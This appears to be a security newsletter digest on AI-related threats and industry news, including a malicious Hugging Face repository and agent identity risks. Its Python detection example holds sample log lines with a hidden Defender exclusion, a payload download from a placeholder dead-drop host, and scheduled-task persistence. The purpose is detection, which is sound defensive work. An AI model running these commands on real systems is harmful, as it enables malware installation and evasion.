2026-05-12

AI Attack Surface Expands, Your ERP's New Coworker, Critica

A fake OpenAI repo on Hugging Face hit 244K downloads. A scan of 1M+ AI services found widespread misconfiguration. CISA told critical infrastructure operators to plan for isolation. Anthropic signed a $1.8B Akamai deal. SAP's API policy is pushing ERP agent builders into SFTP and email.

The TLDR IT digest from the week of May 11 is the clearest case yet that "AI security" is no longer a category — it is the operating environment.

What You Need to Know: A fake OpenAI repository on Hugging Face pushed an infostealer to 244,000 downloads before removal. A scan of 1M+ exposed AI services found weak defaults and misconfigurations across the board. CISA issued new guidance telling critical infrastructure operators to plan for isolation and recovery from cyberattacks before they happen. Anthropic signed a $1.8B deal with Akamai. And the "ERP has a new coworker" essay makes the case that SAP's new API policy is forcing agent builders into SFTP, email, and screen automation workarounds.

Why It Matters

  • 244,000 downloads of a fake "OpenAI Privacy Filter" repo before it was pulled. The repository ranked #1 on Hugging Face for its target query. The malware targeted browser data, cryptocurrency wallets, and credentials, and used anti-analysis techniques to evade detection. Hugging Face is now a malware distribution channel for AI-adjacent tooling, and the trust signals developers borrowed from open source (search ranking, download counts, a familiar vendor name) are exactly what this campaign gamed.
  • 1M exposed AI services, mostly misconfigured. Research covered by The Hacker News scanned more than a million internet-exposed AI services and found weak defaults, public exposure, and default or unrotated credentials. AI infrastructure is being deployed with the same security posture as an experimental notebook, but it is connected to production data and customer-facing systems.
  • CISA's new CI Fortify guidance reframes the resilience problem. Critical infrastructure operators are now being told to plan for isolation and recovery from cyberattacks before a crisis, not after. The assumption is no longer "we will detect and contain" — it is "we will be cut off, and we need to keep running."
  • For builders: the IAM/agent identity problem is no longer a research paper. The Hacker News published a separate piece arguing that AI agents are already operating inside enterprise environments faster than identity and access management systems can track them. If you ship enterprise AI, the delegated authority problem is your problem.

What Actually Happened

Fake OpenAI repo on Hugging Face: 244K downloads

A malicious repository on Hugging Face, Open-OSS/privacy-filter, impersonated OpenAI and distributed Rust-based infostealer malware. The chain used JSON Keeper as a dead drop, scheduled tasks for persistence, and Defender exclusions for evasion to pull and run a stealer targeting wallets, Discord, browsers, and files, then exfiltrate the results. Linked repos and reused infrastructure tie the activity to ValleyRAT distribution previously seen with the trevlo npm package and Silver Fox operations. BleepingComputer's reporting notes the repository reached 244,000 downloads before removal. The standard remediation is full reimaging and rotation of every credential that existed on the infected machine, including browser-saved passwords, SSH keys, cloud CLI tokens, and any wallet seed stored locally. Model weights and tooling pulled from Hugging Face now belong on the same third-party review path as any package from npm or PyPI.
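The three host-side stages named above (a download from a remote dead drop, a Defender exclusion, a scheduled task) are each noisy on their own but rarely occur together under one interpreter process. The following is an added example, not code from the reporting or from any vendor: a small rule set run over constructed process-creation records in a tab-separated key=value format that imitates the fields Sysmon Event ID 1 would carry. The log lines, hostnames, paths and the `.invalid` URL are all constructed placeholders, and the rule patterns are assumptions about what the commands look like, not indicators from the campaign.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Rule table: (stage, pattern over the command line, analyst note).
# Patterns are illustrative assumptions, not published IOCs.
RULES = [
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I),
     "Defender exclusion added via PowerShell"),
    ("defender_exclusion",
     re.compile(r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection)\b", re.I),
     "Defender real-time protection disabled"),
    ("scheduled_task",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b", re.I),
     "scheduled task created from the command line"),
    ("scheduled_task",
     re.compile(r"\bRegister-ScheduledTask\b", re.I),
     "scheduled task registered via PowerShell"),
    ("remote_fetch",
     re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget|DownloadString|DownloadFile)\b"
                r"|certutil\b.*-urlcache", re.I),
     "content fetched from a remote host"),
]


@dataclass
class Hit:
    line_no: int
    stage: str
    note: str
    parent: str
    cmdline: str


def parse_record(line):
    """Tab-separated key=value fields (a constructed format, not Sysmon's XML)."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def scan(lines):
    """Run every rule over the CommandLine field of each record."""
    hits = []
    for n, line in enumerate(lines, 1):
        record = parse_record(line)
        cmd = record.get("CommandLine", "")
        for stage, pattern, note in RULES:
            if pattern.search(cmd):
                hits.append(Hit(n, stage, note, record.get("ParentImage", ""), cmd))
    return hits


def stages(hits):
    """Distinct stages seen. All three in one session is the chain, not noise."""
    return {h.stage for h in hits}


def by_parent(hits):
    """Pivot on the parent: a scripting interpreter spawning all three is the tell."""
    return Counter(h.parent for h in hits)


def rec(**fields):
    """Build one constructed record."""
    return "\t".join(f"{k}={v}" for k, v in fields.items())


# Constructed sample telemetry: a developer installs a package, then the
# interpreter spawns the evasion, download and persistence steps.
SAMPLE_LOG = [
    rec(ts="2026-05-11T09:12:03Z", Image=r"C:\Python312\python.exe",
        ParentImage=r"C:\Windows\explorer.exe",
        CommandLine="python.exe -m pip install privacy-filter"),
    rec(ts="2026-05-11T09:12:09Z", Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        ParentImage=r"C:\Python312\python.exe",
        CommandLine=r'powershell.exe -NoP -W Hidden -c "Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\Temp"'),
    rec(ts="2026-05-11T09:12:11Z", Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        ParentImage=r"C:\Python312\python.exe",
        CommandLine=r'powershell.exe -NoP -W Hidden -c "iwr http://dead-drop.example.invalid/stage2 -OutFile $env:LOCALAPPDATA\Temp\pf.exe"'),
    rec(ts="2026-05-11T09:12:14Z", Image=r"C:\Windows\System32\schtasks.exe",
        ParentImage=r"C:\Python312\python.exe",
        CommandLine=r'schtasks.exe /create /tn PrivacyFilterUpdate /tr "C:\Users\dev\AppData\Local\Temp\pf.exe" /sc onlogon /f'),
    rec(ts="2026-05-11T09:13:40Z", Image=r"C:\Program Files\Git\cmd\git.exe",
        ParentImage=r"C:\Windows\explorer.exe", CommandLine="git.exe pull"),
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"line {h.line_no}: {h.stage}: {h.note}")
    print("stages seen:", sorted(stages(found)))   # all three stages
    print("parents:", by_parent(found))            # python.exe spawned all of them
```

The rules are deliberately broad; on real telemetry the signal is the conjunction, so alert on `stages()` covering two or more stages under the same parent within a short window rather than on any single rule. Real Sysmon or EDR exports need their own parser in place of `parse_record`.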

1M exposed AI services, mostly misconfigured

The Hacker News covered research that scanned more than a million internet-exposed AI services and found weak defaults, misconfigurations, and public exposure. The pattern: AI infrastructure is being deployed like experimental software, but it is increasingly connected to real data and production systems. Researchers found model endpoints with default admin credentials, training data buckets open to the internet, and inference APIs exposing internal service metadata. The paper's argument: the security review checklist for AI infrastructure is fundamentally different from web app security, and most teams haven't updated their checklist.

CISA's CI Fortify guidance: plan to be cut off

CISA issued new CI Fortify guidance urging critical infrastructure operators to build isolation and recovery capabilities before a disruptive cyberattack. The assumption is that during a major incident, normal network paths, cloud services, and vendor support may be degraded. Operators need to know which systems must keep running, how to operate them with degraded tooling, and how to recover when the dust settles. The guidance is especially relevant for IT and security teams running systems where downtime translates directly to public safety risk. Poland's Internal Security Agency reported the same week that hackers breached five water treatment plants and gained control of industrial equipment.

Anthropic's $1.8B Akamai deal

Bloomberg reported that Anthropic signed a $1.8 billion cloud computing deal with Akamai to support growing demand for its AI software. The deal adds another signal that AI infrastructure demand is spilling beyond the usual hyperscaler relationships. Combined with the deals Anthropic struck or expanded with CoreWeave, Amazon, Google, Broadcom, and xAI in the same period, the company is now the largest independent buyer of compute capacity in the industry. The dependency is asymmetric: the labs need the cloud vendors more than the cloud vendors need any individual lab.

"Your ERP has a new coworker"

A Substack essay by CloudSquid argues that integrating AI agents with enterprise ERP systems via CLI tooling and the Model Context Protocol (MCP) is harder than the demo videos suggest. AI agents need data access, code environments, and integration layers to automate ERP tasks. MCP offers structured tool discovery, but CLI is better for high-volume data movement. SAP's new API policy restricts third-party agents, forcing developers to use alternative integration methods: SFTP, email, and screen automation. The author's conclusion: enterprise AI agents are going to live in the integration gaps, not the official APIs, for the next 12–18 months at minimum.

The Take

Read these stories together and the pattern is obvious. The threat surface is moving from "people" to "agents." Fake model repos target developers. Misconfigured AI services expose the infrastructure those developers deploy to. ERP integrations are happening over SFTP and email because the official paths are blocked. Critical infrastructure is being told to plan for isolation because the perimeter is already gone. This is the same arc that web security went through in 2008–2014, compressed into 18 months.

The IAM problem is the one to watch. The Hacker News piece on enterprise AI identity is the most important read of the week. The argument: AI agents are already acting on behalf of users and systems, but they don't have proper identity primitives. They're being given OAuth tokens, service account credentials, and API keys that are long-lived, rarely rotated, scoped to the whole account rather than to an action, and not attributable to the human who delegated them. That is the same class of failure as the over-privileged third-party credentials behind the 2013 Target breach, multiplied across every agent an enterprise deploys.

For builders: the next 12 months of enterprise AI security work is going to be identity work. If you ship agent tooling, design for ephemeral credentials, per-action authorization, and audit logging that lets a CISO explain to a regulator what an agent did last Tuesday. The market for agentic identity primitives is going to look like the market for cloud identity primitives did in 2015 — and the winners will be the ones who ship first.
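What "ephemeral credentials, per-action authorization, and audit logging" look like in one place, as an added example that is not from the article or from any IAM product: an HMAC-signed token that names the agent, the delegating user, an explicit scope list and an expiry, plus an `authorize()` gate that checks one action at a time and records every decision, allow or deny, against the delegating user. The token format, scope names, the in-memory audit sink and the hard-coded signing key are assumptions for the demo; in a real deployment the key comes from a KMS and rotates, and the audit entries go to an append-only store.

```python
import base64
import hashlib
import hmac
import json
import time

# Assumption: in a real deployment this lives in a KMS/HSM and is rotated.
SIGNING_KEY = b"demo-only-signing-key-rotate-me"

AUDIT_LOG = []  # hypothetical in-memory sink; one entry per decision


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def fingerprint(token: str) -> str:
    """Stable identifier for a token that is safe to write to logs (never the token)."""
    return hashlib.sha256(token.encode()).hexdigest()[:16]


def mint(agent_id, on_behalf_of, scopes, ttl_s, now=None):
    """Issue a short-lived, HMAC-signed credential carrying the agent identity,
    the delegating user and an explicit list of permitted actions."""
    now = int(time.time() if now is None else now)
    claims = {"agent": agent_id, "sub": on_behalf_of,
              "scopes": sorted(scopes), "iat": now, "exp": now + ttl_s}
    body = _b64(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())
    sig = _b64(hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def verify(token, now=None):
    """Return the claims if the signature checks and the token is unexpired;
    raise PermissionError with a reason otherwise."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".", 1)
        sig_bytes = _unb64(sig)
        claims = json.loads(_unb64(body))
    except ValueError:  # covers bad base64 (binascii.Error) and bad JSON
        raise PermissionError("malformed token")
    expected = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig_bytes, expected):
        raise PermissionError("bad signature")
    if now >= claims["exp"]:
        raise PermissionError("token expired")
    return claims


def authorize(token, action, resource, now=None):
    """Per-action decision: allow only if the token verifies and names the
    action in its scopes. Every decision is recorded with the delegating user,
    so 'what did this agent do, and on whose authority' is one log query."""
    now = int(time.time() if now is None else now)
    entry = {"ts": now, "token": fingerprint(token), "agent": None, "sub": None,
             "action": action, "resource": resource, "decision": "deny", "reason": ""}
    try:
        claims = verify(token, now)
        entry["agent"], entry["sub"] = claims["agent"], claims["sub"]
        if action in claims["scopes"]:
            entry["decision"], entry["reason"] = "allow", "action in scope"
        else:
            entry["reason"] = "action not in scope"
    except PermissionError as exc:
        entry["reason"] = str(exc)
    AUDIT_LOG.append(entry)
    return entry["decision"] == "allow"


if __name__ == "__main__":
    t0 = 1_700_000_000  # fixed clock so the demo is reproducible
    tok = mint("invoice-agent-7", "alice@example.com",
               {"erp:read_invoice", "erp:post_journal"}, ttl_s=300, now=t0)
    print(authorize(tok, "erp:read_invoice", "INV-1042", now=t0 + 10))     # True
    print(authorize(tok, "erp:approve_payment", "INV-1042", now=t0 + 10))  # False: not in scope
    print(authorize(tok, "erp:read_invoice", "INV-1042", now=t0 + 600))    # False: expired
    for entry in AUDIT_LOG:
        print(json.dumps(entry))
```

Two design points worth noting. The scope check is on the action the agent is about to take, not on the agent as a whole, so a prompt-injected agent cannot widen its own authority without a new token from the issuer. And the deny path is logged with the same fields as the allow path; an audit trail that only records successes cannot answer a regulator's question about what an agent tried to do.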

Quick Summary

A fake OpenAI repo on Hugging Face hit 244K downloads. A scan of 1M+ exposed AI services found systemic misconfiguration. CISA told critical infrastructure operators to plan for isolation. Anthropic signed $1.8B with Akamai. SAP's API restrictions are pushing ERP agent builders into SFTP and email.
